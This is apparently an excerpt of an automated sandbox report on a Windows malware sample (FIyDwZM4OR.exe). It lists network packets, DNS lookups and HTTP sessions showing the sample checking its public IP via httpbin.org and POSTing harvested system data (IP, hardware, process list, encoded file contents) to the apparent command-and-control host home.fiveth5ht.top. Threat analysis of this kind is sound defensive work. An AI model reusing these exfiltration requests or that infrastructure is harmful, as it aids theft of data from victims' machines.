                                                            Dec 28, 2024 10:00:21.430082083 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.430169106 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.430179119 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.430248976 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.430413961 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.430429935 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.430444956 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.430465937 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.430474997 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.430521011 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.430530071 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.430577993 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.430599928 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.430691957 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.430701017 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.430763960 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.430779934 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.430850029 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.430872917 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.483455896 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.483628035 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.483788967 CET4973180192.168.2.481.29.149.125
                                                            Dec 28, 2024 10:00:21.483951092 CET4973180192.168.2.481.29.149.125
                                                            Dec 28, 2024 10:00:21.498318911 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.498334885 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.541673899 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.541686058 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.541832924 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.541841984 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.541944981 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.541997910 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.542009115 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.544719934 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.544729948 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.544847965 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.544883013 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.544936895 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.544976950 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.545057058 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.545067072 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.545113087 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.545157909 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.545197964 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.545260906 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.545432091 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.545440912 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.545461893 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.545509100 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.545555115 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.545600891 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.545680046 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.545689106 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.545721054 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.545752048 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.545820951 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.545914888 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.545923948 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.545933962 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.548600912 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.548612118 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.548706055 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.548716068 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.548774004 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.548820019 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.548950911 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.548979044 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.549060106 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.549124956 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.549206972 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.549263954 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.549273968 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.549309969 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.549380064 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.549432039 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.549540997 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.549550056 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.549642086 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.549659967 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.549761057 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.549770117 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.549824953 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.549834967 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.549927950 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.549937010 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.549977064 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.550055981 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.603373051 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.603471994 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:22.185810089 CET4973280192.168.2.481.29.149.125
                                                            Dec 28, 2024 10:00:22.305357933 CET804973281.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:22.305428982 CET4973280192.168.2.481.29.149.125
                                                            Dec 28, 2024 10:00:22.305883884 CET4973280192.168.2.481.29.149.125
                                                            Dec 28, 2024 10:00:22.425297976 CET804973281.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:23.574021101 CET804973281.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:23.574315071 CET804973281.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:23.574395895 CET4973280192.168.2.481.29.149.125
                                                            Dec 28, 2024 10:00:23.574553013 CET4973280192.168.2.481.29.149.125
                                                            Dec 28, 2024 10:00:23.694024086 CET804973281.29.149.125192.168.2.4

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 28, 2024 10:00:15.160046101 CET5440553192.168.2.41.1.1.1
                                                            Dec 28, 2024 10:00:15.160116911 CET5440553192.168.2.41.1.1.1
                                                            Dec 28, 2024 10:00:15.302299023 CET53544051.1.1.1192.168.2.4
                                                            Dec 28, 2024 10:00:15.302319050 CET53544051.1.1.1192.168.2.4
                                                            Dec 28, 2024 10:00:19.592344046 CET5440853192.168.2.41.1.1.1
                                                            Dec 28, 2024 10:00:19.592466116 CET5440853192.168.2.41.1.1.1
                                                            Dec 28, 2024 10:00:19.734144926 CET53544081.1.1.1192.168.2.4
                                                            Dec 28, 2024 10:00:20.001030922 CET53544081.1.1.1192.168.2.4
                                                            Dec 28, 2024 10:00:22.043572903 CET5441053192.168.2.41.1.1.1
                                                            Dec 28, 2024 10:00:22.043641090 CET5441053192.168.2.41.1.1.1
                                                            Dec 28, 2024 10:00:22.184119940 CET53544101.1.1.1192.168.2.4
                                                            Dec 28, 2024 10:00:22.184927940 CET53544101.1.1.1192.168.2.4

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Dec 28, 2024 10:00:15.160046101 CET192.168.2.41.1.1.10xd31dStandard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                            Dec 28, 2024 10:00:15.160116911 CET192.168.2.41.1.1.10xf4beStandard query (0)httpbin.org28IN (0x0001)false
                                                            Dec 28, 2024 10:00:19.592344046 CET192.168.2.41.1.1.10x99c8Standard query (0)home.fiveth5ht.topA (IP address)IN (0x0001)false
                                                            Dec 28, 2024 10:00:19.592466116 CET192.168.2.41.1.1.10xbb2aStandard query (0)home.fiveth5ht.top28IN (0x0001)false
                                                            Dec 28, 2024 10:00:22.043572903 CET192.168.2.41.1.1.10x7446Standard query (0)home.fiveth5ht.topA (IP address)IN (0x0001)false
                                                            Dec 28, 2024 10:00:22.043641090 CET192.168.2.41.1.1.10x5a86Standard query (0)home.fiveth5ht.top28IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Dec 28, 2024 10:00:15.302299023 CET1.1.1.1192.168.2.40xd31dNo error (0)httpbin.org3.218.7.103A (IP address)IN (0x0001)false
                                                            Dec 28, 2024 10:00:15.302299023 CET1.1.1.1192.168.2.40xd31dNo error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                                            Dec 28, 2024 10:00:19.734144926 CET1.1.1.1192.168.2.40x99c8No error (0)home.fiveth5ht.top81.29.149.125A (IP address)IN (0x0001)false
                                                            Dec 28, 2024 10:00:22.184119940 CET1.1.1.1192.168.2.40x7446No error (0)home.fiveth5ht.top81.29.149.125A (IP address)IN (0x0001)false
                                                            Dec 28, 2024 10:00:33.446007967 CET1.1.1.1192.168.2.40xeb06No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                            Dec 28, 2024 10:00:33.446007967 CET1.1.1.1192.168.2.40xeb06No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • httpbin.org
                                                            • home.fiveth5ht.top

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.44973181.29.149.125806908C:\Users\user\Desktop\FIyDwZM4OR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 28, 2024 10:00:20.122982979 CET12360OUTPOST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                                            Host: home.fiveth5ht.top
                                                            Accept: */*
                                                            Content-Type: application/json
                                                            Content-Length: 561676
                                                            Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 33 32 39 31 35 34 35 38 33 31 37 32 30 35 30 32 34 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                                            Data Ascii: { "ip": "8.46.123.189", "current_time": "8532915458317205024", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 920 }, { "name": "dwm.exe", "pid": 988 }, { "name": "svchost.exe", "pid": 364 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 696 }, { "name": "svchost.exe" [TRUNCATED]
                                                            Dec 28, 2024 10:00:20.242842913 CET12360OUTData Raw: 34 48 55 56 5c 2f 59 7a 5c 2f 41 4d 4f 72 76 32 43 5c 2f 2b 69 45 44 5c 2f 77 41 4f 64 38 5a 50 5c 2f 6e 68 30 66 38 4f 72 76 32 43 5c 2f 2b 69 45 44 5c 2f 77 41 4f 64 38 5a 50 5c 2f 6e 68 31 5c 2f 4e 48 5c 2f 41 42 50 6a 77 6e 5c 2f 30 51 50 45
                                                            Data Ascii: 4HUV\/Yz\/AMOrv2C\/+iED\/wAOd8ZP\/nh0f8Orv2C\/+iED\/wAOd8ZP\/nh1\/NH\/ABPjwn\/0QPEX\/hzy3\/5D1\/p6f1z\/AMU2uNv+jlcLf+GjNv8A5P1\/p6fxzVHJ2\/H+lfpf+1f+wZ4h+HHhTxH8e\/hbpk2pfCCH4ufHfwbrGg2Zvr6++GFh8P8A46\/EP4c+GDdz3tzf6lqnhq60Tw1pUT+Ib27uLu11V5Id
                                                            Dec 28, 2024 10:00:20.242896080 CET7416OUTData Raw: 5c 2f 30 4e 50 70 47 42 62 38 38 30 48 51 51 66 78 62 65 5c 2f 36 64 63 56 46 73 50 74 5c 2f 6e 38 4b 6c 66 5c 2f 57 48 5c 2f 41 48 52 5c 2f 53 69 67 43 76 55 66 6c 2b 5c 2f 36 66 5c 2f 58 71 79 5c 2f 54 38 66 36 47 6f 71 44 71 70 64 50 38 50 2b
                                                            Data Ascii: \/0NPpGBb880HQQfxbe\/6dcVFsPt\/n8Klf\/WH\/AHR\/SigCvUfl+\/6f\/Xqy\/T8f6GoqDqpdP8P+RVf7p\/D+YqFvlznt6Vc8v3\/T\/wCvUdBsV6Y\/T8f6GnsvYj\/PqKjk7fj\/AEoOgjqPy\/f9P\/r1JRQaw2+f6Iqsu78Kh\/8AQP8AP4dP84q55fv+n\/16rNH7fJ\/ID\/PGM+9B0+\/\/AHfxIZFx9\/8A5a
                                                            Dec 28, 2024 10:00:20.242973089 CET2472OUTData Raw: 2b 4b 65 47 77 72 78 53 6a 37 58 45 56 4d 54 4b 6e 43 76 47 6c 4b 6e 5c 2f 4c 68 5c 2f 77 41 45 59 42 41 76 5c 2f 42 54 6a 39 6e 46 62 57 53 57 61 32 57 58 34 7a 69 33 6d 6e 68 53 32 6e 6c 67 48 77 45 2b 4b 77 68 6b 6d 74 34 35 37 71 4f 43 56 34
                                                            Data Ascii: +KeGwrxSj7XEVMTKnCvGlKn\/Lh\/wAEYBAv\/BTj9nFbWSWa2WX4zi3mnhS2nlgHwE+Kwhkmt457qOCV49rSQpdXKROSizzKokb+pLQ\/2Uf+Cl1hoHxC0\/Wv+Csf9va54j8I2Gj+AvEP\/DCXwC0v\/hW\/iq38feCPEN74y\/sm08RvZ+MP7Q8DaF4z+Hf\/AAj2svBptp\/wnn\/CWwytrHhfSoJvV\/gf\/wAEy\/2Hv2
                                                            Dec 28, 2024 10:00:20.242984056 CET2472OUTData Raw: 38 52 2b 56 4e 71 78 54 48 36 66 6a 5c 2f 51 30 47 6c 50 72 38 76 31 4b 33 6c 2b 5c 2f 36 66 5c 2f 58 71 4f 72 46 46 42 6f 55 70 46 5c 2f 6a 39 50 38 4f 31 4d 71 31 4c 33 5c 2f 33 66 38 61 67 32 48 32 5c 2f 7a 2b 46 42 30 45 50 64 5c 2f 6f 50 35
                                                            Data Ascii: 8R+VNqxTH6fj\/Q0GlPr8v1K3l+\/6f\/XqOrFFBoUpF\/j9P8O1Mq1L3\/3f8ag2H2\/z+FB0EPd\/oP5VFViq9aez8\/w\/4JtTqfP9f+D\/AMHQKj8v3\/T\/AOvUlRj\/AJafj\/Wszo9\/+7+JDIuPw\/kf8\/zqGrFQv94\/h\/IUGvO\/L+vmV2Xbjvmm1YqJ+v4f1NBqMqCSP5eufw\/z16VPRQdBSkj+Xjj69\/8AP
                                                            Dec 28, 2024 10:00:20.363053083 CET7416OUTData Raw: 39 75 50 4b 6a 5c 2f 41 4e 66 5c 2f 41 4d 75 76 36 38 39 4f 4b 7a 41 50 37 5c 2f 38 41 31 79 38 33 4d 6e 35 65 5c 2f 77 44 58 31 39 61 5a 5c 2f 77 41 44 6a 54 5c 2f 6c 72 39 6f 39 65 5c 2f 74 36 66 35 7a 79 2b 50 5a 35 6d 64 2b 79 50 6a 5c 2f 70
                                                            Data Ascii: 9uPKj\/ANf\/AMuv689OKzAP7\/8A1y83Mn5e\/wDX19aZ\/wADjT\/lr9o9e\/t6f5zy+PZ5md+yPj\/pvTPvfx7H80xf6r\/Xf5\/XPvyHQMk3\/JseN\/3v\/PX8vw6dKZ91k\/j\/ANiT8u1PbY8c2\/zE8z\/thj\/P\/wBfIp8f7z1R\/wDllHJFj\/P4+9AFOT+8n18r8zj+XT8u9SeYgk\/1PkzT\/vc\/67jr\/omM
                                                            Dec 28, 2024 10:00:20.363116980 CET2472OUTData Raw: 72 34 31 38 43 5c 2f 44 44 52 76 6a 4c 2b 7a 37 34 6f 2b 4b 6e 6a 50 34 76 2b 41 50 67 6a 71 50 77 36 38 50 38 41 6a 6e 78 31 71 47 71 65 42 66 47 33 78 41 38 54 36 64 34 4d 74 34 5c 2f 45 48 6a 43 4c 34 55 48 34 53 65 4c 62 4c 77 31 34 6d 31 57
                                                            Data Ascii: r418C\/DDRvjL+z74o+KnjP4v+APgjqPw68P8Ajnx1qGqeBfG3xA8T6d4Mt4\/EHjCL4UH4SeLbLw14m1Wy03xW3wX+JHxXv7ENd3+nWGrabpWr3lh8dLwR+iQvq\/LxHj67xNKlXoxwvEOPxk3hq2Ey3HQxU4YXA1p0sIsJm+VVquLqxp4egsywUa1WnPE0Yy\/QY\/SE+m45YmNThfLcN9Uq18PWnjuGcrwFJYrD4vMcDUwdO
                                                            Dec 28, 2024 10:00:20.363193035 CET2472OUTData Raw: 73 74 65 57 63 53 63 55 5a 70 6d 33 45 65 5a 59 64 76 42 78 6b 73 77 7a 50 4d 38 56 69 4d 7a 6a 56 77 6d 44 72 31 76 37 4e 72 55 73 77 6e 69 4b 56 62 4c 63 53 71 4f 4b 77 55 34 75 68 57 6f 55 35 51 73 4e 66 37 70 5c 2f 44 2b 59 71 47 72 46 52 50
                                                            Data Ascii: steWcScUZpm3EeZYdvBxkswzPM8ViMzjVwmDr1v7NrUswniKVbLcSqOKwU4uhWoU5QsNf7p\/D+YqGrFRP1\/D+pr7Y+IGUUUUAQv8AeP4fyFNp79fw\/qaZQdBGY\/T8Qf8AP6YqF\/un8P5irVQv94\/h\/IUAVaKmf7p\/D+Ypm35c9+v4f55\/Sug6BlQv94\/h\/IVNRQBXop+w+3+fwppUr\/8AWoOgSq9WKhPV\/wAf\
                                                            Dec 28, 2024 10:00:20.363228083 CET2472OUTData Raw: 48 39 39 41 6e 5c 2f 41 45 79 5c 2f 64 79 5c 2f 75 4b 6d 38 76 35 70 6e 38 6b 76 35 66 31 38 6a 2b 66 4e 4d 2b 58 6a 35 42 4e 2b 36 38 32 57 50 7a 66 7a 36 5c 2f 57 67 76 6e 66 6c 5c 2f 58 7a 47 62 6b 6a 56 30 2b 2b 5c 2f 6c 66 75 6f 34 5c 2f 31
                                                            Data Ascii: H99An\/AEy\/dy\/uKm8v5pn8kv5f18j+fNM+Xj5BN+682WPzfz6\/Wgvnfl\/XzGbkjV0++\/lfuo4\/1\/pVbbIi79nz\/wDTP9x\/nt3OKmk2SN5P8Zi\/z\/k9KGZP3L7I08uL97\/x9e\/+f\/1UGoSR\/K7xw\/J\/rfLk\/wBf9n\/5dBn8x+VQv8uzZ\/y0\/dS9ef8Ap6+vp\/hR8hX7myHyvKikjl\/1P+l8\/wCc
                                                            Dec 28, 2024 10:00:20.406461000 CET27192OUTData Raw: 58 78 6f 73 76 32 2b 4e 43 2b 49 66 78 56 38 59 65 4e 50 69 39 34 30 38 64 65 41 76 69 39 38 4c 62 4c 34 4c 2b 49 62 33 39 6a 54 78 5c 2f 72 46 39 34 41 31 37 77 44 6f 50 68 58 57 5c 2f 32 6f 66 41 6d 69 66 45 58 34 56 2b 4c 50 68 33 42 59 32 75
                                                            Data Ascii: Xxosv2+NC+IfxV8YeNPi9408deAvi98LbL4L+Ib39jTx\/rF94A17wDoPhXW\/2ofAmifEX4V+LPh3BY2usSeEdP8ABtzpHrs\/h3w\/dSNNc6Fo9xM33pZ9MspZG\/3nkgZj+Jo\/4R7QA6SDQ9HEkZzG\/wDZllvjJ6lG8jcpOBypB4r1av0Qcor5plOYVeMc55MpzHMcfCnSp4WlXxX9pZhTx1bD4rGewnXr0aapxo0\/rcs
                                                            Dec 28, 2024 10:00:20.526231050 CET7416OUTData Raw: 38 4f 76 42 37 5c 2f 41 4c 4c 66 50 56 5c 2f 35 67 61 66 5c 2f 41 41 4e 66 49 38 64 6f 6f 6f 72 5c 2f 41 4b 4a 6a 5c 2f 41 77 4b 62 4c 33 5c 2f 41 4e 37 5c 2f 41 42 70 31 46 41 46 65 76 36 4a 5c 2f 2b 43 48 62 34 38 45 5c 2f 74 44 44 30 38 55 5c
                                                            Data Ascii: 8OvB7\/ALLfPV\/5gaf\/AANfI8dooor\/AKJj\/AwKbL3\/AN7\/ABp1FAFev6J\/+CHb48E\/tDD08U\/D04\/3tJ8VD\/2Wv53PL9\/0\/wDr1+\/X\/BHDxXo3gH4Q\/tY+NfEdz9j8PeDG8KeLNeugm5rXRvD\/AIY8datqlwqFkVjDY2U8oVnQMVALKCTX8sfTFo1cR4MYqhRpyq1q3E3DlKlShFynUqVMVUhCnCMU3KU
                                                            Dec 28, 2024 10:00:21.483455896 CET212INHTTP/1.0 503 Service Unavailable
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.44973281.29.149.125806908C:\Users\user\Desktop\FIyDwZM4OR.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 28, 2024 10:00:22.305883884 CET284OUTPOST /OyKvQKriwnyyWjwCxSXF1735186862 HTTP/1.1
                                                            Host: home.fiveth5ht.top
                                                            Accept: */*
                                                            Content-Type: application/json
                                                            Content-Length: 143
                                                            Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                                            Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
                                                            Dec 28, 2024 10:00:23.574021101 CET212INHTTP/1.0 503 Service Unavailable
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                            HTTPS Proxied Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.4497303.218.7.1034436908C:\Users\user\Desktop\FIyDwZM4OR.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-28 09:00:17 UTC52OUTGET /ip HTTP/1.1
                                                            Host: httpbin.org
                                                            Accept: */*
                                                            2024-12-28 09:00:17 UTC224INHTTP/1.1 200 OK
                                                            Date: Sat, 28 Dec 2024 09:00:17 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 31
                                                            Connection: close
                                                            Server: gunicorn/19.9.0
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Allow-Credentials: true
                                                            2024-12-28 09:00:17 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                            Data Ascii: { "origin": "8.46.123.189"}


                                                            Statistics

                                                            CPU Usage

                                                            Click to jump to process

                                                            Memory Usage

                                                            Click to jump to process

                                                            High Level Behavior Distribution

                                                            Click to dive into process behavior distribution

                                                            System Behavior

                                                            General

                                                            Target ID:0
                                                            Start time:04:00:11
                                                            Start date:28/12/2024
                                                            Path:C:\Users\user\Desktop\FIyDwZM4OR.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\FIyDwZM4OR.exe"
                                                            Imagebase:0xe90000
                                                            File size:4'464'128 bytes
                                                            MD5 hash:81FAA857E0E440955735ED78A8C61DDD
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Disassembly

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:3.7%
                                                              Dynamic/Decrypted Code Coverage:15.4%
                                                              Signature Coverage:11%
                                                              Total number of Nodes:689
                                                              Total number of Limit Nodes:106
